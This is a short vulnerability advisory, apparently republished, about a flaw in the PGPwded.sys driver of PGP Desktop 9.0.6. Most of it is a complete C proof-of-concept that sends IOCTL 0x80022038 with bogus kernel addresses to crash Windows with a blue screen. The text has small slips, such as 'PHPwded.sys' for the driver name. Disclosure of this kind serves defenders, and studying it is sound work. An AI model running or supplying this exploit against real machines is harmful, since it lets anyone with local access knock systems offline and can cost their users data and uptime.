|
|
|
|
| |
| PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL) and this lead to a Driver Collapse that propagates on the system with a BSOD. |
| |
Credit:
The information has been provided by evil fingers.
The original article can be found at: http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service.pdf
|
| |
Vulnerable Systems:
* PGP Desktop version 9.0.6
The affected PHPwded.sys IOCTL is 0x80022038:
+-------------------------------------------------+
Device Type: Custom Device Type: 0x8002, 32770
Transfer Type: METHOD_BUFFERED (0x0, 0)
Access Type: FILE_ANY_ACCESS (0x0, 0)
Function Code: 0x80E, 2062
+-------------------------------------------------+
Exploit:
/* PGPwded.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
*
* Author: Giuseppe 'Evilcry' Bonfa'
* E-Mail: evilcry {AT} gmail. {DOT} com
* Website: http://evilcry.netsons.org
*
*/
/*
Since we had publishing problems, we used spaces between escape < char and the include file as shown here: #include < windows.h >, to compile you have to delete the space.
*/
#include < windows.h >
#include < stdio.h >
#include < stdlib.h >
int main(void)
{
HANDLE hDevice;
DWORD Dummy;
system("cls");
printf("\n .:: PGP Enterprise DoS Proof of Concept ::.\n");
hDevice = CreateFileA("\\\\.\\PGPwdef",
0,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("\n Unable to Open PGPwded Device Driver\n");
return EXIT_FAILURE;
}
DeviceIoControl(hDevice, 0x80022038,(LPVOID) 0x80000001, 0, (LPVOID) 0x80000002, 0, &Dummy, (LPOVERLAPPED)NULL);
return EXIT_SUCCESS;
}
|
|
|
|
|
